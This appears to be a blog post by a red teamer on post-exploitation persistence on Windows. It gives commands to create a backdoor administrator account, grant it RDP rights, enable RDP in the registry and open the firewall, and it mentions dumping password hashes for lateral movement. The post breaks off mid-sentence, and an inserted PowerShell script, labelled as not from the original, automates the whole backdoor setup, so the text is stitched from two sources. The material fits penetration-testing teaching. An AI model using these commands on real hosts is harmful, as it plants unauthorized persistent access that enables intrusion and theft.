Persist and Live on Windows Systems

ice-wzl
5 min read · Sep 13, 2021

So congrats, you got NT AUTHORITY\SYSTEM on a Windows computer. That begs the question: now what? Today I want to walk you through some important steps to take after escalating privileges on Windows. We are going to start by adding a user and putting them into the appropriate groups so we keep access to this system. We will then enable RDP if it is not already on, configure the firewall to let our RDP sessions through, and finally dump the local password hashes for all users as backup access, which also gives potential lateral-movement capability if the host is domain-joined or the local administrator password is reused elsewhere.

Let's get that user added.

The following commands create a user, add them to the local Administrators group, and add them to the "Remote Desktop Users" group. This gives us admin rights on the system as well as the ability to RDP in, which can be huge for post-exploitation and artifact gathering. Note that if a local or domain password policy enforces complexity, net user will reject a short password like the one below with "The password does not meet the password policy requirements", so pick one that passes.

Add a user named Ice with the password Hacking

net user Ice Hacking /add

Add the user Ice into the local Administrators group

net localgroup administrators Ice /add

Add the user Ice into the “Remote Desktop Users” group

net localgroup "Remote Desktop Users" Ice /add

Enable RDP

Now that we have our user added to the system we can move on to enabling RDP if it is not already. Whether RDP is exposed should have been discovered in the Recon and Enumeration stage of your penetration test; if you want to double-check before attempting to remote in, you can use the command below from your attacking machine.

sudo nmap -sS {ip address} -p 3389

Note: While 3389 is the default port for RDP, a System Administrator could have moved it to another port (the PortNumber value under the RDP-Tcp WinStations key in the registry). This goes back to information we should find during our initial Recon of the target.

If RDP is not enabled we can turn it on with this reg.exe command from the cmd.exe prompt (fDenyTSConnections = 0 is the "allow remote connections to this computer" switch):

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

To allow RDP through the Windows Firewall you can enter this command from the cmd.exe prompt:
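The whole procedure above (create the account, add it to both groups, flip fDenyTSConnections, open the firewall) as one idempotent PowerShell script. This is an added example, not code from the original post; it uses the post's account name, password and group names, and the verification block at the end is my addition. It must run from an elevated (Administrator or SYSTEM) shell on a host that has the Microsoft.PowerShell.LocalAccounts and NetSecurity modules (Windows 8 / Server 2012 and later).

```powershell
# Added example: the post's persistence steps as a PowerShell script.
# Run elevated. Account name/password are the post's ("Ice" / "Hacking").
#Requires -RunAsAdministrator

$UserName = 'Ice'
$Password = ConvertTo-SecureString 'Hacking' -AsPlainText -Force

# 1. Create the local account, skipping it if it already exists.
#    A password policy that enforces complexity will throw here; choose a
#    longer password in that case.
if (-not (Get-LocalUser -Name $UserName -ErrorAction SilentlyContinue)) {
    New-LocalUser -Name $UserName -Password $Password `
        -PasswordNeverExpires -AccountNeverExpires | Out-Null
}

# 2. Add it to Administrators (S-1-5-32-544) and Remote Desktop Users
#    (S-1-5-32-555). Resolving the groups by well-known SID instead of by
#    name keeps this working on localized Windows builds.
foreach ($sid in 'S-1-5-32-544', 'S-1-5-32-555') {
    $group = Get-LocalGroup -SID $sid
    $already = Get-LocalGroupMember -Group $group -Member $UserName -ErrorAction SilentlyContinue
    if (-not $already) {
        Add-LocalGroupMember -Group $group -Member $UserName
    }
}

# 3. Enable RDP: fDenyTSConnections = 0 means "allow remote connections".
$tsKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
Set-ItemProperty -Path $tsKey -Name 'fDenyTSConnections' -Value 0 -Type DWord

# Make sure the Remote Desktop service is running and will come back on reboot.
Set-Service -Name TermService -StartupType Automatic
Start-Service -Name TermService

# 4. Open the built-in "Remote Desktop" firewall rule group (TCP and UDP).
#    On localized builds the display group name differs; the resource-string
#    form of the same group is -Group '@FirewallAPI.dll,-28752'.
Enable-NetFirewallRule -DisplayGroup 'Remote Desktop'

# 5. Verify: which port RDP is actually listening on (admins may have moved it
#    off 3389), whether something is listening there, and the group membership.
$rdpPort = (Get-ItemProperty -Path "$tsKey\WinStations\RDP-Tcp").PortNumber
[PSCustomObject]@{
    RdpPort     = $rdpPort
    Listening   = [bool](Get-NetTCPConnection -LocalPort $rdpPort -State Listen -ErrorAction SilentlyContinue)
    TermService = (Get-Service TermService).Status
    RdpUsers    = (Get-LocalGroupMember -SID 'S-1-5-32-555' | ForEach-Object Name) -join ', '
    Admins      = (Get-LocalGroupMember -SID 'S-1-5-32-544' | ForEach-Object Name) -join ', '
}
```

On hosts too old for the NetSecurity module, the firewall step is the classic netsh form, netsh advfirewall firewall set rule group="remote desktop" new enable=Yes. Keep in mind that every step here is logged: account creation is Security event 4720, the local group additions are 4732, and the registry and firewall changes are visible to any EDR watching those keys, so a defender reviewing the box will find this persistence quickly if nobody is tidying up afterwards.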


Reverse Engineer, Red Teamer, CTF fan & creator